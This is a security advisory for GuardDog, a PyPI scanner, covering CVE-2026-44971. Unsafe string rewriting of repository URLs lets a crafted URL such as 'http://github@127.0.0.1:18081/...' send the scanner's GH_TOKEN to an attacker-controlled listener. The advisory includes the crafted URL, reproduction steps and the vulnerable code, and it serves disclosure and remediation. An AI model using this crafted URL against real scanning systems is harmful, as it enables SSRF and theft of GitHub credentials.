GHSA-587r-mc96-6f2p

Suggest an improvement
Source
https://github.com/advisories/GHSA-587r-mc96-6f2p
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-587r-mc96-6f2p/GHSA-587r-mc96-6f2p.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-587r-mc96-6f2p
Aliases
  • CVE-2026-44971
Published
2026-05-11T14:45:08Z
Modified
2026-05-11T15:05:42.191546Z
Severity
  • 8.2 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N CVSS Calculator
Summary
GuardDog has a blind GitHub URL rewrite in remote project scanning causes SSRF and `GH_TOKEN` exfiltration
Details

Summary

The programmatic remote project scanning path rewrites attacker-controlled repository URLs using a blind string replacement and then sends the caller's GitHub credentials with the resulting request. This allows an attacker who can influence the scanned repository URL to trigger SSRF and capture the GH_TOKEN used by GuardDog.

Description

ProjectScanner.scan_remote() takes a url, branch, and requirements_name, then constructs a raw GitHub URL by calling:

githubusercontent_url = url.replace("github", "raw.githubusercontent")
req_url = f"{githubusercontent_url}/{branch}/{requirements_name}"
resp = requests.get(url=req_url, auth=token)

Because this logic does not parse or validate the hostname, a crafted URL such as:

http://github@127.0.0.1:18081/owner/repo

is transformed into:

http://raw.githubusercontent@127.0.0.1:18081/owner/repo/main/requirements.txt

Requests interprets this as an HTTP request to 127.0.0.1:18081, and GuardDog includes the configured GitHub credentials via HTTP Basic Auth.

Reproduction summary

  1. Start an HTTP listener on 127.0.0.1:18081 that logs the request path and Authorization header.
  2. Set GIT_USERNAME=alice and GH_TOKEN=supersecret.
  3. Call PypiRequirementsScanner().scan_remote("http://github@127.0.0.1:18081/owner/repo", "main", "requirements.txt").
  4. Observe a request to /owner/repo/main/requirements.txt with Authorization: Basic YWxpY2U6c3VwZXJzZWNyZXQ=.

Key code paths

  • guarddog/scanners/scanner.py:361-365

Practical impact

This can expose repository-scanning infrastructure to: - theft of the GitHub PAT configured in GH_TOKEN - SSRF to internal or localhost services reachable by the scanner - attacker-controlled dependency file content returned by the malicious endpoint

Prior public disclosure check

As of 2026-03-18, no matching public GitHub advisory, CVE, or public repo issue was found for this specific bug.

Suggested fix

Parse the input URL, require hostname == "github.com", validate the path shape (owner/repo), build the raw URL from parsed components instead of string replacement, and never send GitHub credentials to non-GitHub hosts.

Database specific 
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T14:45:08Z",
    "cwe_ids": [
        "CWE-918"
    ],
    "severity": "HIGH",
    "nvd_published_at": null
}
References

Affected packages

PyPI / guarddog

Package

Name
guarddog
View open source insights on deps.dev
Purl
pkg:pypi/guarddog

Affected ranges

Type
ECOSYSTEM
Events
Introduced
1.0.0
Last affected
2.9.0

Affected versions

1.*
1.0.0
1.0.1
1.0.2
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.2
1.2.1
1.3.0
1.4.0
1.5.0
1.5.1
1.5.2
1.5.3
1.5.4
1.5.5
1.5.6
1.5.7
1.5.8
1.6.0
1.7.0
1.8.0
1.8.1
1.8.2
1.9.0
1.10.0
1.10.1
1.11.0
1.11.1
1.11.2
2.*
2.0.0
2.0.1
2.0.2
2.0.3
2.0.4
2.0.5
2.0.6
2.1.0
2.2.0
2.3.0
2.4.0
2.5.0
2.6.0
2.7.0
2.7.1
2.8.4
2.9.0

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-587r-mc96-6f2p/GHSA-587r-mc96-6f2p.json"